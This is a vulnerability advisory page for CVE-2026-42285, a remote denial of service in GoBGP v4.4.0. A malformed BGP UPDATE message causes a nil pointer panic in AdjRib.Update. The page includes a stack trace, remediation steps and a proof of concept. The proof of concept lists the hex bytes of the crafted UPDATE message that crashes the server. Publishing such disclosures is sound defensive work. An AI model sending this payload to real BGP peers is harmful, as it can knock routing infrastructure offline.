Skip to main content

GoBGP CVE-2026-42285

HIGH
NULL Pointer Dereference (CWE-476)
2026-05-05 https://github.com/osrg/gobgp GHSA-p3w2-64xm-833j
Denial Of Service Null Pointer Dereference Suse
7.5
CVSS 3.1
Share

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
May 05, 2026 - 21:33 vuln.today
Analysis Generated
May 05, 2026 - 21:33 vuln.today

DescriptionNVD

Summary

Remote Denial of Service (DoS) via Nil Pointer Dereference in BGP Update Processing An unauthenticated remote BGP peer can trigger a fatal panic in GoBGP by sending a specially crafted BGP UPDATE message. When the server receives a message with inconsistent attribute lengths, it improperly handles the internal state transition to a "withdraw" action, leading to a nil pointer dereference in the AdjRib.Update function. This causes the entire GoBGP process to crash, resulting in a complete loss of service availability.

Details

The vulnerability originates in the interaction between the BGP message decoding logic and the Adj-RIB table management.

Triggering Condition: When a BGP UPDATE message contains attributes that fail validation (e.g., "attribute value length is short"), GoBGP logs a warning: the received Update message was treated as withdraw.

Code Path:

The message reaches github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate.

Due to the malformed attributes, the message is processed as a withdrawal, but the internal representation of the path or its attributes becomes nil.

The execution flows to internal/pkg/table/adj.go:127 within (*AdjRib).Update.

The Flaw: At line 127 in adj.go, the code attempts to access a member of a structure (likely the path or a specific attribute container) that is nil due to the previous validation failure.

Log Snippet:

{"time":"2026-04-21T12:43:10.009107962+08:00","level":"WARN","msg":"the received Update message was treated as withdraw","Topic":"Peer","Key":"192.168.31.195","State":"BGP_FSM_ESTABLISHED","Error":"attribute value length is short"}
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0xbca9e8]

goroutine 52 [running]:
github.com/osrg/gobgp/v4/internal/pkg/table.(*AdjRib).Update(0x1fec929b4480, {0x1fec928ca0e8, 0x1, 0xfffffffffffffffc?})
        /home/base/Desktop/gobgp/internal/pkg/table/adj.go:127 +0xa8
github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate(0x1fec92b90c40, 0x1fec92c0c900)
        /home/base/Desktop/gobgp/pkg/server/peer.go:656 +0xed4
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).handleFSMMessage(0x1fec928c8488, 0x1fec92b90c40, 0x1fec92c0c900)
        /home/base/Desktop/gobgp/pkg/server/server.go:1670 +0x14c6
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).startFsmHandler.func1(0x1fec935c0b00?)
        /home/base/Desktop/gobgp/pkg/server/server.go:253 +0x25
github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).recvMessageloop(0x1fec92acee40, {0x105c750, 0x1fec92970500}, {0x106a558, 0x1fec933bc000}, 0x1fec92c1a2a0, 0x1fec92c18a10, 0x0?)
        /home/base/Desktop/gobgp/pkg/server/fsm.go:1893 +0xe82
created by github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).established in goroutine 37
        /home/base/Desktop/gobgp/pkg/server/fsm.go:1920 +0x2d5

PoC

[SEND] OPEN
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 1d 01 04 fd ea 00 5a c3 a8 1f c3 00
[RECV] Type: 1 | Length: 77
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 4d 01 04 fd e9 00 5a c0 a8 1f 82 30 02 2e 02 00 49 16 14 62 61 73 65 2d 76 69 72 74 75 61 6c 2d 6d 61 63 68 69 6e 65 00 01 04 00 19 00 46 41 04 00 00 fd e9 05 06 00 19 00 46 00 02
[+] Received OPEN from peer
[SEND] KEEPALIVE
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[RECV] Type: 4 | Length: 19
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[+] BGP Session Established
[SEND] Crafted UPDATE
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 50 02 00 04 18 ac 10 01 00 35 35 01 01 04 2d 02 00 90 0e 00 19 3e 01 a8 c0 1f 82 00 02 21 00 01 c0 a8 1f 12 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 11 22 33 44 55 0f 11 80 00
[*] Waiting for peer reaction...
[+] Done.

Impact

Remote Denial of Service (DoS) in GoBGP v4.4.0

AnalysisAI

GoBGP v4.4.0 crashes with SIGSEGV panic when an unauthenticated remote BGP peer sends malformed UPDATE messages with inconsistent attribute lengths. The nil pointer dereference in AdjRib.Update (adj.go:127) causes complete process termination and loss of BGP service. …

Sign in for full analysis, threat intelligence, and remediation guidance.

RemediationAI

Within 24 hours: Identify all systems running GoBGP versions 4.4.0 and earlier using inventory tools or gobgpd -v checks; document BGP peers and topology dependencies. Within 7 days: Upgrade affected GoBGP instances to v4.5.0 or later, testing in non-production first; coordinate upgrades during maintenance windows to minimize routing disruption. …

Sign in for detailed remediation steps.

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

Sign in - Free

More from same product – last 7 days

CVE-2026-9256 HIGH
8.1 May 22

Heap buffer overflow in NGINX Plus and NGINX Open Source ngx_http_rewrite_module allows unauthenticated remote attackers

Vendor StatusVendor

Share

CVE-2026-42285 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy